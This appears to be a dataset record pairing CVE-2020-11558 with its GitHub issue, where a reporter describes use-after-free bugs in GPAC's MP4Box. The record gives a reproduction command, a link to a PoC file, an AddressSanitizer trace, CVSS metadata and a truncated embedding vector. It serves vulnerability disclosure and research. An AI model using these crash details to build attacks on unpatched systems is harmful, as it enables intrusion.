cve_id
stringclasses
822 values
cve_published
timestamp[ns]
cve_descriptions
stringclasses
818 values
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringclasses
844 values
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
0
8.04k
issue_title
stringlengths
1
346
issue_comments_url
stringlengths
59
81
issue_comments_count
int64
0
146
issue_created_at
timestamp[ns]
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
40
62
issue_github_id
int64
128M
2.4B
issue_number
int64
21
125k
label
bool
2 classes
issue_msg
stringlengths
120
8.18k
issue_msg_n_tokens
int64
120
8.18k
issue_embedding
sequencelengths
3.07k
3.07k
CVE-2020-11558
2020-04-05T20:15:12.650000
An issue was discovered in libgpac.a in GPAC 0.8.0, as demonstrated by MP4Box. audio_sample_entry_Read in isomedia/box_code_base.c does not properly decide when to make gf_isom_box_del calls. This leads to various use-after-free outcomes involving mdia_Read, gf_isom_delete_movie, and gf_isom_parse_movie_boxes.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/6063b1a011c3f80cee25daade18154e15e4c058c" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1440" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1440
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi GPAC Team, I found 3 new UAF bugs on the lastest commit 56eaea8 of GPAC version 0.8.0. I think it is probably due to **an imcomplete fix** of the UAF bug https://github.com/gpac/gpac/issues/1340. Actually, these new bugs share the same buggy function which is `gf_isom_box_del()` in src/isomedia/box_funcs.c with https://github.com/gpac/gpac/issues/1340, but have different alloc function `esds_New()` in `src/isomedia/box_code_base.c` (instead of `stco_New()`). Command: `MP4Box -info $POC` or `MP4Box -diso $POC` #### 1) UAF Bug 1 PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_56eaea8/uaf1 ASAN says: ~~~ ================================================================= ==31565==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000dde8 at pc 0x0000006c601e bp 0x7fff726c3b70 sp 0x7fff726c3b60 READ of size 8 at 0x60400000dde8 thread T0 #0 0x6c601d in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 #1 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #2 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #3 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #4 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #5 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #6 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #7 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #8 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #9 0x6c72cd in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1427 #10 0xae0b0f in mdia_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3021 #11 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #12 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #13 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #14 0xaeffe8 in trak_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:7188 #15 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #16 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #17 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #18 0xae3444 in moov_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3749 #19 0x6c7764 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #20 0x6c7764 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #21 0x6c7fb4 in gf_isom_parse_root_box /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:42 #22 0x6dd940 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:207 #23 0x6e05d3 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:195 #24 0x6e05d3 in gf_isom_open_file /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:616 #25 0x43375d in mp4boxMain /home/dungnguyen/fuzz/gpac/applications/mp4box/main.c:4814 #26 0x7fca8b87382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #27 0x41e4f8 in _start (/home/dungnguyen/PoCs/gpac_new/MP4Box+0x41e4f8) 0x60400000dde8 is located 24 bytes inside of 48-byte region [0x60400000ddd0,0x60400000de00) freed by thread T0 here: #0 0x7fca8c61732a in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9832a) #1 0x6c5f9f in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1512 previously allocated by thread T0 here: #0 0x7fca8c617662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662) #1 0xadb68d in esds_New /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:1287 SUMMARY: AddressSanitizer: heap-use-after-free /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 gf_isom_box_del ~~~
3 UAF bugs in box_funcs.c
https://api.github.com/repos/gpac/gpac/issues/1440/comments
4
2020-03-24T17:16:05
2020-03-26T19:28:46Z
https://github.com/gpac/gpac/issues/1440
587,134,103
1,440
true
This is a GitHub Issue repo:gpac owner:gpac Title : 3 UAF bugs in box_funcs.c Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi GPAC Team, I found 3 new UAF bugs on the lastest commit 56eaea8 of GPAC version 0.8.0. I think it is probably due to **an imcomplete fix** of the UAF bug https://github.com/gpac/gpac/issues/1340. Actually, these new bugs share the same buggy function which is `gf_isom_box_del()` in src/isomedia/box_funcs.c with https://github.com/gpac/gpac/issues/1340, but have different alloc function `esds_New()` in `src/isomedia/box_code_base.c` (instead of `stco_New()`). Command: `MP4Box -info $POC` or `MP4Box -diso $POC` #### 1) UAF Bug 1 PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_56eaea8/uaf1 ASAN says: ~~~ ================================================================= ==31565==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000dde8 at pc 0x0000006c601e bp 0x7fff726c3b70 sp 0x7fff726c3b60 READ of size 8 at 0x60400000dde8 thread T0 #0 0x6c601d in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 #1 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #2 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #3 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #4 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #5 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #6 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #7 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #8 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #9 0x6c72cd in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1427 #10 0xae0b0f in mdia_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3021 #11 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #12 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #13 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #14 0xaeffe8 in trak_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:7188 #15 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #16 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #17 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #18 0xae3444 in moov_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3749 #19 0x6c7764 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #20 0x6c7764 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #21 0x6c7fb4 in gf_isom_parse_root_box /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:42 #22 0x6dd940 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:207 #23 0x6e05d3 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:195 #24 0x6e05d3 in gf_isom_open_file /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:616 #25 0x43375d in mp4boxMain /home/dungnguyen/fuzz/gpac/applications/mp4box/main.c:4814 #26 0x7fca8b87382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #27 0x41e4f8 in _start (/home/dungnguyen/PoCs/gpac_new/MP4Box+0x41e4f8) 0x60400000dde8 is located 24 bytes inside of 48-byte region [0x60400000ddd0,0x60400000de00) freed by thread T0 here: #0 0x7fca8c61732a in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9832a) #1 0x6c5f9f in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1512 previously allocated by thread T0 here: #0 0x7fca8c617662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662) #1 0xadb68d in esds_New /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:1287 SUMMARY: AddressSanitizer: heap-use-after-free /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 gf_isom_box_del ~~~ --- end body ---
5,052
[ -0.03261517360806465, 0.025413647294044495, -0.01833115518093109, -0.015236284583806992, 0.019238784909248352, 0.02757112868130207, -0.04913106560707092, 0.041572440415620804, 0.007766934111714363, 0.029698852449655533, -0.0037421148736029863, -0.004471194930374622, 0.02648494765162468, 0.00839929934591055, -0.010036010295152664, -0.019313180819153786, 0.004363320767879486, 0.048416867852211, 0.006026069633662701, -0.0050775217823684216, 0.024818480014801025, -0.053981680423021317, -0.028954893350601196, 0.05442805588245392, 0.004374480340629816, 0.004430277273058891, 0.0042108092457056046, 0.00991697609424591, 0.013554937206208706, 0.015757055953145027, -0.004114094655960798, 0.02429770864546299, -0.00900934636592865, 0.02816629596054554, 0.030918944627046585, -0.01706642471253872, 0.04389359429478645, 0.07076539844274521, 0.002802866278216243, 0.022690756246447563, -0.011382576078176498, -0.05427926406264305, -0.04276277497410774, 0.014410490170121193, -0.001778062549419701, 0.03088918700814247, 0.011092431843280792, 0.006186021026223898, -0.013331749476492405, 0.008771278895437717, 0.026633739471435547, -0.003853708738461137, -0.01897096075117588, -0.05541008338332176, 0.03499584272503853, -0.03398405760526657, 0.04472682997584343, 0.005282110534608364, 0.004980807192623615, 0.01651589572429657, -0.001048982492648065, 0.007699978072196245, -0.006052108481526375, 0.02843412198126316, 0.018554342910647392, 0.007945484481751919, 0.004828295204788446, 0.001952892984263599, -0.0004254516679793596, 0.01770623028278351, 0.002456925343722105, -0.040382105857133865, -0.0138748399913311, 0.03948935493826866, 0.018866805359721184, -0.028999529778957367, 0.03889418765902519, 0.03121652826666832, -0.011680159717798233, 0.04088800027966499, -0.03044281154870987, 0.030189866200089455, -0.011501609347760677, 0.02202119305729866, 0.02416379563510418, 0.016620049253106117, -0.03502560034394264, -0.08189503103494644, -0.014023631811141968, -0.030294019728899002, -0.004556750413030386, 0.010430308058857918, 0.01847994700074196, -0.019313180819153786, 0.009730986319482327, 0.002224438125267625, -0.028865618631243706, -0.0021295833867043257, -0.0526127964258194, 0.0026968521997332573, -0.02516070008277893, -0.016024881973862648, -0.007722296752035618, 0.009187896735966206, 0.008748960681259632, 0.010861804708838463, 0.025086304172873497, -0.01775086671113968, -0.018271638080477715, 0.1271277517080307, 0.027898471802473068, 0.014871745370328426, -0.01715569943189621, 0.015444593504071236, 0.019938107579946518, 0.010817167349159718, -0.008183551020920277, -0.00969378836452961, -0.0395786315202713, -0.012877934612333775, 0.012275326997041702, -0.005341627169400454, 0.0015492950333282351, 0.026693256571888924, -0.04389359429478645, 0.048535898327827454, -0.004910130985081196, 0.0011233784025534987, -0.019938107579946518, -0.0032975992653518915, -0.039697665721178055, -0.018405551090836525, -0.0021760808303952217, -0.030561845749616623, -0.003678878303617239, -0.0017027367139235139, -0.005624331533908844, 0.043298427015542984, 0.017319370061159134, 0.02392572909593582, -0.06915844976902008, -0.028538275510072708, 0.02402988262474537, -0.008503453806042671, -0.02852339670062065, -0.018212120980024338, 0.002771248109638691, 0.005869838409125805, -0.022913943976163864, -0.02202119305729866, -0.0010647916933521628, -0.04234616085886955, 0.021485542878508568, 0.02356862835586071, 0.06475421041250229, 0.010884123854339123, 0.027362819761037827, 0.047256290912628174, -0.004184770863503218, 0.0005491349147632718, -0.004407958593219519, -0.030948704108595848, 0.00438935961574316, -0.04187002405524254, -0.043387703597545624, -0.0515117384493351, 0.014045950025320053, 0.020815979689359665, -0.012863054871559143, 0.020815979689359665, 0.008793598040938377, -0.013807883486151695, 0.04600643739104271, 0.05496370792388916, -0.04826807603240013, -0.02938639000058174, 0.015094933100044727, 0.02502678893506527, -0.023092495277523994, -0.006591478828340769, 0.004865493159741163, 0.021500421687960625, -0.0018533883849158883, 0.0052077146247029305, 0.016530774533748627, -0.02548804320394993, 0.018405551090836525, -0.04353649541735649, 0.008436497300863266, -0.028865618631243706, 0.013897158205509186, -0.0009764464921317995, 0.02438698336482048, 0.00346313021145761, 0.04469706863164902, 0.0032027445267885923, -0.008250507526099682, -0.0017427244456484914, 0.006465005688369274, 0.01760207489132881, 0.016367102041840553, -0.010430308058857918, 0.0031134693417698145, 0.00591447576880455, -0.037108685821294785, -0.018346033990383148, 0.007115969900041819, 0.040114279836416245, -0.0023899690713733435, 0.01089900266379118, -0.01611415669322014, -0.031960487365722656, 0.020682066679000854, 0.017185458913445473, -0.015861211344599724, 0.010341033339500427, -0.028002625331282616, -0.00887543335556984, -0.030368415638804436, -0.00996161438524723, 0.014120345935225487, 0.009329249151051044, 0.013517739251255989, -0.020905254408717155, -0.02480360120534897, -0.025354130193591118, 0.02856803499162197, 0.005509017966687679, -0.054070957005023956, -0.008890313096344471, 0.022854426875710487, 0.00076209323015064, 0.009143258444964886, 0.009879778139293194, -0.004359601065516472, -0.004021099768579006, 0.0006142313359305263, 0.010928761214017868, -0.013428463600575924, 0.011836390942335129, -0.012587790377438068, 0.022363414987921715, -0.022467568516731262, -0.01770623028278351, 0.013056484051048756, 0.080466628074646, -0.006208339706063271, -0.010512144304811954, -0.02475896291434765, 0.03568028286099434, 0.0277496799826622, -0.030591603368520737, -0.019491732120513916, 0.009864899329841137, 0.012595229782164097, 0.0046981023624539375, 0.01693251170217991, 0.007391234859824181, -0.020057139918208122, -0.04139389097690582, -0.003636100795120001, 0.007208964787423611, -0.021812884137034416, 0.007878527976572514, 0.013941795565187931, -0.026008814573287964, 0.0005161217413842678, 0.013220155611634254, -0.023910850286483765, -0.01810796745121479, 0.03612665832042694, -0.0006649135611951351, -0.0324961394071579, -0.01066837552934885, -0.0015995122957974672, 0.020101778209209442, -0.019863711670041084, 0.01883704774081707, -0.0053527867421507835, -0.002090525347739458, 0.0035710043739527464, 0.00996161438524723, 0.005490418989211321, 0.015459472313523293, 0.006159982178360224, -0.00036756234476342797, -0.005687568336725235, -0.006863024085760117, -0.0007383795455098152, 0.0051965550519526005, 0.01961076445877552, 0.015801694244146347, -0.02902928926050663, 0.00281588570214808, 0.00982770137488842, 0.029044168069958687, 0.00562061183154583, 0.0049733673222362995, -0.03234734758734703, 0.009589634835720062, 0.016129035502672195, 0.010735332034528255, -0.045024413615465164, -0.0061153448186814785, -0.03079991228878498, 0.023464474827051163, -0.037555061280727386, 0.004244287498295307, -0.019402457401156425, 0.027675284072756767, 0.025651713833212852, -0.04469706863164902, -0.03820974752306938, -0.02739257924258709, -0.03550173342227936, -0.007588384207338095, -0.008867993950843811, -0.032049763947725296, -0.02834484726190567, 0.0182418804615736, -0.018122846260666847, -0.006762589327991009, -0.004590228199958801, 0.028047263622283936, 0.04198905825614929, 0.00041661717114038765, -0.002810305915772915, 0.017735987901687622, -0.06386145949363708, 0.0013809743104502559, 0.0000010679883644115762, -0.013569816015660763, 0.01264730654656887, -0.023732298985123634, 0.0017910818569362164, -0.023122252896428108, -0.027868712320923805, 0.025874901562929153, 0.032972272485494614, -0.013182957656681538, 0.002174220746383071, 0.029698852449655533, 0.011918227188289165, -0.0034780094865709543, -0.0340435728430748, -0.01656053215265274, -0.005475539714097977, -0.011858710087835789, -0.0021128442604094744, -0.003515207441523671, 0.001072231214493513, 0.029996436089277267, 0.005791722796857357, 0.054219748824834824, 0.03335913270711899, -0.0239852461963892, -0.010378231294453144, -0.011270982213318348, 0.030680878087878227, 0.015578506514430046, 0.002769388258457184, -0.006658434867858887, -0.009931855835020542, 0.03285323828458786, 0.0072052450850605965, 0.010140163823962212, 0.011561126448214054, 0.007878527976572514, 0.01651589572429657, -0.008615047670900822, -0.050618987530469894, 0.06457565724849701, -0.03594810888171196, -0.0010620018001645803, -0.010489825159311295, -0.008592729456722736, 0.031781937927007675, 0.033835265785455704, -0.04404238611459732, 0.004240567795932293, -0.03344840556383133, -0.016887875273823738, 0.040203556418418884, -0.05142246186733246, -0.01264730654656887, 0.03154386952519417, -0.031246287748217583, 0.07594335824251175, -0.002817745553329587, -0.03258541226387024, -0.05478515848517418, 0.038150228559970856, -0.003954143263399601, -0.038923945277929306, -0.0211135633289814, 0.019417336210608482, -0.0426735021173954, -0.027452096343040466, -0.021917039528489113, -0.0391322560608387, 0.020458878949284554, 0.007990121841430664, -0.03225807100534439, 0.02257172204554081, -0.010802287608385086, 0.04317939281463623, 0.001988230971619487, 0.004705542232841253, 0.04877396672964096, -0.0006188810802996159, 0.015414834953844547, -0.015310680493712425, -0.012624988332390785, 0.009760744869709015, 0.048387106508016586, 0.0064017693512141705, -0.006636116188019514, 0.032972272485494614, -0.037108685821294785, 0.01996786519885063, -0.0023304522037506104, 0.000996905378997326, 0.003314338391646743, 0.005955393426120281, 0.025398768484592438, 0.02648494765162468, -0.029371509328484535, 0.00716804713010788, 0.028404362499713898, -0.028880497440695763, 0.016218310222029686, 0.002825185190886259, -0.006773748900741339, 0.012022380717098713, -0.0105567816644907, -0.02620224468410015, -0.05169028788805008, -0.034698259085416794, -0.012855615466833115, -0.01987859047949314, -0.003275280585512519, 0.033329375088214874, 0.00201240973547101, 0.00492501026019454, 0.0028344846796244383, -0.05047019571065903, -0.012833296321332455, 0.008734080940485, 0.0030353537295013666, -0.03386502340435982, 0.0022076989989727736, -0.0044860742054879665, -0.0006053968099877238, 0.0048803724348545074, 0.007982682436704636, -0.013324310071766376, -0.017825262621045113, -0.013078803196549416, 0.03243662044405937, 0.015147009864449501, 0.006405489053577185, 0.04618499055504799, -0.004891532007604837, 0.008213309571146965, 0.016441497951745987, 0.035055357962846756, -0.0001690182398306206, -0.038745395839214325, 0.00996161438524723, -0.022869305685162544, 0.01888168603181839, 0.037465788424015045, 0.00875640008598566, 0.0031227688305079937, 0.002051467541605234, 0.02248244732618332, 0.015757055953145027, -0.020101778209209442, -0.021128442138433456, -0.03618617728352547, -0.0009266941924579442, -0.007811571937054396, 0.003632380859926343, 0.014001312665641308, 0.008503453806042671, -0.027466975152492523, -0.01788477972149849, 0.009024225175380707, 0.010564221069216728, -0.006022349931299686, 0.015325560234487057, 0.005092401057481766, -0.0025220217648893595, 0.0029404987581074238, 0.024089399725198746, -0.02657422423362732, -0.010869244113564491, -0.007071332540363073, 0.01828651688992977, 0.0014553702203556895, 0.01751280017197132, -0.01464855670928955, 0.013770685531198978, 0.0077966926619410515, 0.02843412198126316, -0.033686473965644836, -0.01897096075117588, 0.01956612803041935, 0.011055233888328075, -0.027065236121416092, -0.01030383538454771, -0.025726109743118286, 0.014291456900537014, -0.037019409239292145, -0.020860616117715836, -0.02330080233514309, 0.004991966299712658, 0.010251757688820362, 0.025904661044478416, 0.009292050264775753, -0.020488636568188667, -0.01592072658240795, -0.02179800532758236, 0.03219855576753616, 0.029326872900128365, 0.01137513667345047, -0.0014925681753084064, 0.007056453265249729, 0.04413166269659996, -0.009812822565436363, -0.015682660043239594, -0.007729736156761646, -0.03279372304677963, 0.008101715706288815, -0.008741521276533604, -0.014871745370328426, 0.006591478828340769, 0.05567790940403938, -0.006468725390732288, -0.0234347153455019, -0.0499643012881279, 0.044607795774936676, -0.027318183332681656, 0.005237473174929619, -0.013688849285244942, 0.03972742334008217, -0.002678253222256899, 0.030770152807235718, -0.011955425143241882, 0.015117251314222813, -0.00839185994118452, -0.004586508497595787, -0.015935607254505157, 0.013592135161161423, 0.009730986319482327, -0.013383826240897179, -0.013480541296303272, 0.012290206737816334, 0.017006907612085342, 0.004936169367283583, 0.015771934762597084, 0.0036751586012542248, 0.011129629798233509, -0.007365196477621794, 0.0008755470043979585, 0.002732190303504467, -0.007301959674805403, 0.040203556418418884, -0.04463755339384079, -0.01444768812507391, 0.009887218475341797, 0.0025220217648893595, 0.023910850286483765, -0.009835140779614449, -0.017408646643161774, -0.00935156736522913, -0.0013326170155778527, -0.010036010295152664, -0.012505954131484032, -0.0313950777053833, -0.010184802114963531, -0.050172608345746994, -0.026499828323721886, 0.014782469719648361, 0.01609927788376808, -0.0333888903260231, 0.00048682832857593894, 0.01397155411541462, 0.0014841986121609807, -0.01828651688992977, 0.006000031251460314, 0.005356506444513798, -0.015489230863749981, -0.023092495277523994, 0.01601000316441059, -0.005029164254665375, -0.00960451364517212, -0.00958219449967146, 0.00286610284820199, -0.0038499890360981226, -0.027675284072756767, 0.03463874012231827, 0.008615047670900822, -0.04169147461652756, -0.025175580754876137, 0.017230095341801643, 0.023553749546408653, -0.001574403722770512, -0.02361326664686203, 0.006784908007830381, 0.03017498552799225, 0.011278421618044376, 0.04871445149183273, -0.008540651760995388, 0.015280922874808311, -0.01030383538454771, 0.032377105206251144, 0.011561126448214054, -0.012014941312372684, 0.041423648595809937, 0.030294019728899002, -0.03791216388344765, 0.0031078895553946495, -0.01076508965343237, 0.007182926405221224, 0.03243662044405937, 0.019134631380438805, -0.011806633323431015, -0.011866149492561817, -0.002592697972431779, -0.02475896291434765, 0.022274138405919075, 0.01253571268171072, -0.016143914312124252, -0.03657303377985954, 0.02001250348985195, 0.024000125005841255, 0.01194798480719328, -0.03261517360806465, -0.0072052450850605965, 0.007357756607234478, -0.0005826130509376526, -0.03300203010439873, 0.03612665832042694, -0.022095588967204094, 0.007506548427045345, -0.009277171455323696, 0.002957237884402275, 0.0010926901595667005, 0.036513518542051315, -0.03202000632882118, -0.02730330266058445, -0.004370760638266802, 0.014827107079327106, 0.02949054352939129, -0.016545653343200684, 0.03386502340435982, 0.03079991228878498, -0.0014125925954431295, -0.02739257924258709, -0.012260448187589645, -0.029103685170412064, -0.028835859149694443, -0.015109811909496784, -0.02966909483075142, -0.02394060790538788, -0.03240686282515526, 0.0002627106150612235, -0.005773123819380999, 0.016233190894126892, 0.0009606373496353626, 0.0015837032115086913, 0.019089993089437485, -0.005464380607008934, -0.004407958593219519, -0.038150228559970856, -0.0038834670558571815, -0.0005161217413842678, -0.03817998617887497, -0.04228664189577103, 0.0014907083241268992, -0.006624957080930471, 0.006762589327991009, 0.02520533837378025, -0.02074158377945423, 0.016947390511631966, -0.006691913120448589, -0.00190825539175421, -0.013004407286643982, -0.024639928713440895, 0.040798723697662354, -0.00982770137488842, 0.01574217714369297, 0.019268544390797615, -0.004783657845109701, -0.022497326135635376, 0.009500359185039997, 0.002172360895201564, 0.0020719263702630997, -0.008265387266874313, -0.02702059969305992, -0.005702447611838579, -0.00839185994118452, -0.0340435728430748, 0.026053452864289284, 0.032644931226968765, -0.0032064642291516066, 0.014849426224827766, 0.020994529128074646, -0.008845674805343151, 0.0018682676600292325, 0.014745271764695644, -0.025220217183232307, 0.010229439474642277, 0.005553655792027712, -0.0069411396980285645, 0.0007002516067586839, 0.004832015372812748, -0.005795442499220371, 0.025086304172873497, 0.009589634835720062, -0.02611296810209751, -0.010750210843980312, -0.034787531942129135, 0.0020589071791619062, -0.012982088141143322, 0.0044228374026715755, 0.012096776627004147, -0.020399361848831177, 0.014365852810442448, 0.004712981637567282, -0.0417807511985302, 0.021083803847432137, 0.010928761214017868, -0.007275921292603016, -0.015340439043939114, -0.006479884963482618, -0.01651589572429657, -0.0033273575827479362, 0.03606714308261871, -0.0015372057678177953, 0.010943640023469925, -0.003033493645489216, -0.0333888903260231, -0.006584038957953453, 0.0015892828814685345, 0.014514644630253315, -0.017096182331442833, -0.04139389097690582, 0.030561845749616623, 0.01064605638384819, 0.026425432413816452, 0.013368947431445122, -0.012565471231937408, -0.003171126125380397, -0.015310680493712425, 0.035591010004282, 0.0085108932107687, -0.012684504501521587, -0.021232595667243004, -0.006037229206413031, 0.01992322877049446, -0.012937450781464577, 0.006539401598274708, -0.006598918233066797, -0.022809790447354317, -0.006736550945788622, -0.021589696407318115, 0.02865730971097946, 0.014001312665641308, 0.03553149104118347, -0.02684204839169979, -0.017631834372878075, -0.001995670609176159, 0.028136538341641426, -0.010177361778914928, 0.012833296321332455, -0.0021705010440200567, 0.0019305741880089045, 0.0021928197238594294, -0.027422336861491203, 0.003148807445541024, -0.0634448453783989, 0.007848769426345825, 0.015139570459723473, 0.0019212746992707253, 0.029788127169013023, -0.0055238972418010235, -0.017914537340402603, 0.011471850797533989, 0.009879778139293194, 